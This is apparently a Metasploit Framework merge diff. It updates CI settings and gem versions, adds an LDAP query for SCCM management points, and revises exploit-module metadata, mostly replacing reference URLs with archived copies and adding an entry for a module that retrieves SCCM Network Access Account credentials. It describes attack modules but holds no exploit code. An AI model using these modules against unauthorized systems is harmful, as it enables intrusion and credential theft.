Merge pull request #19946 from zeroSteiner/feat/mod/relay/ms08-068-warning

Add a warning for MS08-068 when applicable
automatic module_metadata_base.json update
2025-03-05 11:11:20 -08:00 · 2025-03-05 19:05:21 +00:00 · 2025-03-05 10:58:34 -08:00 · 2025-03-05 13:44:33 -05:00 · 2025-03-05 13:44:33 -05:00 · 2025-03-05 13:44:33 -05:00
210 changed files with 6009 additions and 1852 deletions
@@ -64,7 +64,7 @@ jobs:
      matrix:
        os:
          - windows-2019
-          - ubuntu-20.04
+          - ubuntu-latest
        ruby:
          - '3.2'
        include:
@@ -73,7 +73,7 @@ jobs:
          - { command_shell: { name: powershell }, os: windows-2022 }

          # Linux
-          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+          - { command_shell: { name: linux }, os: ubuntu-latest }

          # CMD
          - { command_shell: { name: cmd }, os: windows-2019 }
@@ -69,12 +69,12 @@ jobs:
        os:
          - macos-13
          - windows-2019
-          - ubuntu-20.04
+          - ubuntu-latest
        ruby:
          - '3.2'
        meterpreter:
          # Python
-          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.8 }
          - { name: python, runtime_version: 3.11 }

          # Java
@@ -92,7 +92,7 @@ jobs:

          # Mettle
          - { meterpreter: { name: mettle }, os: macos-13 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}

@@ -64,7 +64,6 @@ jobs:
          - '3.3'
          - '3.4'
        os:
-          - ubuntu-20.04
          - ubuntu-latest
        include:
          - os: ubuntu-latest
@@ -71,7 +71,7 @@ PATH
      pg
      puma
      railties
-      rasn1 (= 0.13.0)
+      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
@@ -405,7 +405,7 @@ GEM
      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.2.1)
-    rasn1 (0.13.0)
+    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
    recog (3.1.11)
@@ -436,7 +436,7 @@ GEM
      rex-text
      rexml
    rex-java (0.1.7)
-    rex-mime (0.1.8)
+    rex-mime (0.1.11)
      rex-text
    rex-nop (0.1.3)
      rex-arch
@@ -387,3 +387,12 @@ queries:
    references:
      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+  - action: ENUM_SCCM_MANAGEMENT_POINTS
+    description: 'Find all registered SCCM/MECM management points'
+    filter: '(objectclass=mssmsmanagementpoint)'
+    attributes:
+      - cn
+      - dNSHostname
+      - msSMSSiteCode
+    references:
+      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -68,7 +68,7 @@
    ],
    "description": "This module combines two vulnerabilities to achieve remote code\n        execution on affected Android devices. First, the module exploits\n        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n        versions of Android's open source stock browser (the AOSP Browser) prior to\n        4.4. Second, the Google Play store's web interface fails to enforce a\n        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n        targeted for script injection. As a result, this leads to remote code execution\n        through Google Play's remote installation feature, as any application available\n        on the Google Play store can be installed and launched on the user's device.\n\n        This module requires that the user is logged into Google with a vulnerable browser.\n\n        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
    "references": [
-      "URL-https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/",
+      "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/",
      "URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581",
      "OSVDB-110664",
      "CVE-2014-6041"
@@ -83,7 +83,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
    "is_install_path": true,
    "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -1226,7 +1226,7 @@
    ],
    "description": "This module acts as a simple remote control for the Amazon Fire TV's\n        YouTube app.\n\n        Tested on the Amazon Fire TV Stick.",
    "references": [
-      "URL-https://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1",
+      "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8",
      "URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs"
    ],
    "platform": "",
@@ -1248,7 +1248,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 11:29:59 +0000",
    "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb",
    "is_install_path": true,
    "ref_name": "admin/firetv/firetv_youtube",
@@ -1497,7 +1497,7 @@
      "CVE-2015-0964",
      "CVE-2015-0965",
      "CVE-2015-0966",
-      "URL-https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/"
+      "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/"
    ],
    "platform": "",
    "arch": "",
@@ -1509,7 +1509,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
    "is_install_path": true,
    "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -1761,7 +1761,7 @@
    "references": [
      "CVE-2023-20198",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z",
-      "URL-https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
+      "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/"
@@ -1785,7 +1785,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-11-06 11:40:22 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198",
@@ -1826,7 +1826,7 @@
      "CVE-2023-20198",
      "CVE-2023-20273",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z",
-      "URL-https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
+      "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/",
      "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/",
      "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/",
@@ -1851,7 +1851,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-11-06 11:40:22 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273",
@@ -3828,7 +3828,7 @@
    "references": [
      "CVE-2013-0136",
      "US-CERT-VU-701572",
-      "URL-https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/"
+      "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/"
    ],
    "platform": "",
    "arch": "",
@@ -3849,7 +3849,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-08 14:30:08 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
    "is_install_path": true,
    "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -4297,7 +4297,7 @@
    ],
    "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n          of vectors. This vulnerability can allow an attacker to a craft special XML that\n          could read arbitrary files from the filesystem. This module exploits the\n          vulnerability via the XML API.",
    "references": [
-      "URL-https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
+      "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
    ],
    "platform": "",
    "arch": "",
@@ -4318,7 +4318,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-08 14:30:08 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
    "is_install_path": true,
    "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -4733,7 +4733,7 @@
    "references": [
      "CVE-2012-2626",
      "OSVDB-84318",
-      "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
+      "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
    ],
    "platform": "",
    "arch": "",
@@ -4754,7 +4754,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-08 14:30:08 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
    "is_install_path": true,
    "ref_name": "admin/http/scrutinizer_add_user",
@@ -5152,7 +5152,7 @@
    "references": [
      "CVE-2020-1938",
      "EDB-48143",
-      "URL-https://www.chaitin.cn/en/ghostcat"
+      "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat"
    ],
    "platform": "",
    "arch": "",
@@ -5164,7 +5164,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-11-17 12:58:05 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_ghostcat",
@@ -5480,7 +5480,7 @@
    "references": [
      "CVE-2010-3714",
      "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020",
-      "URL-http://gregorkopf.de/slides_berlinsides_2010.pdf"
+      "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf"
    ],
    "platform": "",
    "arch": "",
@@ -5501,7 +5501,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-08 14:30:08 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_sa_2010_020",
@@ -6689,7 +6689,7 @@
      "OSVDB-114751",
      "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
      "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
-      "URL-https://github.com/bidord/pykek",
+      "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek",
      "URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
    ],
    "platform": "",
@@ -6702,7 +6702,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-01-27 09:11:43 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -9131,7 +9131,7 @@
    ],
    "description": "This module allows for simple SQL statements to be executed\n          against an Oracle instance given the appropriate credentials\n          and sid.",
    "references": [
-      "URL-https://www.metasploit.com/users/mc"
+      "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/"
    ],
    "platform": "",
    "arch": "",
@@ -9143,7 +9143,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb",
    "is_install_path": true,
    "ref_name": "admin/oracle/oracle_sql",
@@ -9373,7 +9373,7 @@
    ],
    "description": "This module will create a java class which enables the execution of OS commands.",
    "references": [
-      "URL-https://www.metasploit.com/users/mc"
+      "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/"
    ],
    "platform": "",
    "arch": "",
@@ -9385,7 +9385,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb",
    "is_install_path": true,
    "ref_name": "admin/oracle/post_exploitation/win32exec",
@@ -9455,7 +9455,7 @@
    ],
    "description": "This module simply attempts to discover the protected SID.",
    "references": [
-      "URL-https://www.metasploit.com/users/mc",
+      "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/",
      "URL-http://www.red-database-security.com/scripts/sid.txt"
    ],
    "platform": "",
@@ -9468,7 +9468,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/oracle/sid_brute.rb",
    "is_install_path": true,
    "ref_name": "admin/oracle/sid_brute",
@@ -10554,6 +10554,72 @@
      }
    ]
  },
+  "auxiliary_admin/sccm/get_naa_credentials": {
+    "name": "Get NAA Credentials",
+    "fullname": "auxiliary/admin/sccm/get_naa_credentials",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "xpn",
+      "skelsec",
+      "smashery"
+    ],
+    "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n          This requires a computer account, which can be added using the samr_account module.",
+    "references": [
+      "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/",
+      "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md",
+      "URL-https://github.com/Mayyhem/SharpSCCM",
+      "URL-https://github.com/garrettfoster13/sccmhunter"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-03-03 11:47:10 +0000",
+    "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb",
+    "is_install_path": true,
+    "ref_name": "admin/sccm/get_naa_credentials",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": [
+      "ldap"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/serverprotect/file": {
    "name": "TrendMicro ServerProtect File Access",
    "fullname": "auxiliary/admin/serverprotect/file",
@@ -11726,7 +11792,7 @@
    "description": "This module can be used to read the stored password of a vulnerable\n      Apple Airport Extreme access point. Only a small number of firmware versions\n      have the WDBRPC service running, however the factory configuration was\n      vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n      susceptible to this issue. Once the password is obtained, the access point\n      can be managed using the Apple AirPort utility.",
    "references": [
      "OSVDB-66842",
-      "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+      "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
      "US-CERT-VU-362332"
    ],
    "platform": "",
@@ -11739,7 +11805,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/apple_airport_extreme_password",
@@ -11769,7 +11835,7 @@
    "description": "This module can be used to enable auto-answer mode for the D-Link\n      i2eye video conferencing system. Once this setting has been flipped,\n      the device will accept incoming video calls without acknowledgement.\n      The NetMeeting software included in Windows XP can be used to connect\n      to this device. The i2eye product is no longer supported by the vendor\n      and all models have reached their end of life (EOL).",
    "references": [
      "OSVDB-66842",
-      "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+      "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
      "US-CERT-VU-362332"
    ],
    "platform": "",
@@ -11782,7 +11848,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/dlink_i2eye_autoanswer",
@@ -11812,7 +11878,7 @@
    "description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC",
    "references": [
      "OSVDB-66842",
-      "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+      "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
      "US-CERT-VU-362332"
    ],
    "platform": "",
@@ -11825,7 +11891,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/wdbrpc_memory_dump",
@@ -11858,7 +11924,7 @@
    "description": "This module provides the ability to reboot a VxWorks target through WDBRPC",
    "references": [
      "OSVDB-66842",
-      "URL-https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
+      "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/",
      "US-CERT-VU-362332"
    ],
    "platform": "",
@@ -11871,7 +11937,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/wdbrpc_reboot",
@@ -12018,7 +12084,7 @@
    ],
    "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n        Crock-Pots by implementing a subset of the functionality provided by the\n        Wemo App.\n\n        No vulnerabilities are exploited by this Metasploit module in any way.",
    "references": [
-      "URL-https://www.crock-pot.com/wemo-landing-page.html",
+      "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html",
      "URL-https://www.belkin.com/us/support-article?articleNum=101177",
      "URL-http://www.wemo.com/"
    ],
@@ -12041,7 +12107,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-12-03 01:04:48 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
    "is_install_path": true,
    "ref_name": "admin/wemo/crockpot",
@@ -13316,7 +13382,7 @@
    "description": "This module exploits a vulnerability in WebKit on Apple iOS.\n          If successful, the device will restart after viewing the webpage.",
    "references": [
      "URL-https://twitter.com/pwnsdx/status/1040944750973595649",
-      "URL-https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
+      "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
      "URL-https://nbulischeck.github.io/apple-safari-crash"
    ],
    "platform": "",
@@ -13329,7 +13395,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb",
    "is_install_path": true,
    "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur",
@@ -13576,7 +13642,7 @@
    "description": "This module sends a malformed TKEY query, which exploits an\n        error in handling TKEY queries on affected BIND9 'named' DNS servers.\n        As a result, a vulnerable named server will exit with a REQUIRE\n        assertion failure. This condition can be exploited in versions of BIND\n        between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n        through 9.10.2-P2.",
    "references": [
      "CVE-2015-5477",
-      "URL-https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
+      "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/",
      "URL-https://kb.isc.org/article/AA-01272"
    ],
    "platform": "",
@@ -13589,7 +13655,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tkey",
@@ -16193,7 +16259,7 @@
    "references": [
      "CVE-2017-7924",
      "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03",
-      "URL-https://dl.acm.org/doi/10.1145/3174776.3174780"
+      "URL-http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780"
    ],
    "platform": "",
    "arch": "",
@@ -16205,7 +16271,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb",
    "is_install_path": true,
    "ref_name": "dos/scada/allen_bradley_pccc",
@@ -16407,7 +16473,7 @@
    "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n        exists in the handling of malformed log packets, with an unexpected long level field.\n        The root cause of the vulnerability is a combination of usage of uninitialized memory\n        from the stack and a dangerous string copy. This module has been tested successfully\n        on Yokogawa CENTUM CS 3000 R3.08.50.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/",
+      "URL-http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/",
      "CVE-2014-0781"
    ],
    "platform": "",
@@ -16420,7 +16486,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
    "is_install_path": true,
    "ref_name": "dos/scada/yokogawa_logsvr",
@@ -16633,8 +16699,8 @@
      "CVE-2014-0195",
      "ZDI-14-173",
      "BID-67900",
-      "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
-      "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
+      "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
+      "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
    ],
    "platform": "",
    "arch": "",
@@ -16646,7 +16712,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb",
    "is_install_path": true,
    "ref_name": "dos/ssl/dtls_fragment_overflow",
@@ -17813,8 +17879,8 @@
      "CVE-2012-0002",
      "MSB-MS12-020",
      "URL-http://www.privatepaste.com/ffe875e04a",
-      "URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
-      "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
+      "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
+      "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg",
      "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
      "EDB-18606",
      "URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/"
@@ -17829,7 +17895,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -22837,7 +22903,7 @@
    "references": [
      "CVE-2020-5724",
      "CVE-2020-5723",
-      "URL-https://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf",
+      "URL-http://web.archive.org/web/20230319062924/http://firmware.grandstream.com/Release_Note_UCM6xxx_1.0.20.22.pdf",
      "URL-https://raw.githubusercontent.com/tenable/poc/master/grandstream/ucm62xx/dump_http_user_creds.py"
    ],
    "platform": "",
@@ -22859,7 +22925,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-07-24 16:42:43 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess.rb",
    "is_install_path": true,
    "ref_name": "gather/grandstream_ucm62xx_sql_account_guess",
@@ -24024,7 +24090,7 @@
    "description": "Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection\n      which allows an attacker to access the database or read arbitrary files as the\n      'mysql' user. This module will only work if the mysql user Joomla is using\n      to access the database has the LOAD_FILE permission.",
    "references": [
      "EDB-31459",
-      "URL-https://developer.joomla.org/security/578-20140301-core-sql-injection.html"
+      "URL-http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html"
    ],
    "platform": "",
    "arch": "",
@@ -24045,7 +24111,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/joomla_weblinks_sqli",
@@ -24236,7 +24302,7 @@

    ],
    "targets": null,
-    "mod_time": "2025-02-11 20:49:08 +0000",
+    "mod_time": "2025-02-27 22:29:16 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -24467,6 +24533,10 @@
        "name": "ENUM_PRE_WINDOWS_2000_COMPUTERS",
        "description": "Dump info about all computer objects likely created as a \"pre-Windows 2000 computer\", for which the password might be predictable."
      },
+      {
+        "name": "ENUM_SCCM_MANAGEMENT_POINTS",
+        "description": "Find all registered SCCM/MECM management points"
+      },
      {
        "name": "ENUM_UNCONSTRAINED_DELEGATION",
        "description": "Dump info about all known objects that allow unconstrained delegation."
@@ -25093,7 +25163,7 @@
      "CVE-2013-7331",
      "MSB-MS14-052",
      "URL-https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/",
-      "URL-https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi"
+      "URL-http://web.archive.org/web/20240814143555/https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi"
    ],
    "platform": "Windows",
    "arch": "",
@@ -25105,7 +25175,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/ms14_052_xmldom.rb",
    "is_install_path": true,
    "ref_name": "gather/ms14_052_xmldom",
@@ -27215,7 +27285,7 @@
    "description": "This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting\n          SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to\n          the vendor supplied hotfix \"15.4.2 Hotfix 2\" (version 15.4.2.157) are affected.",
    "references": [
      "CVE-2024-28995",
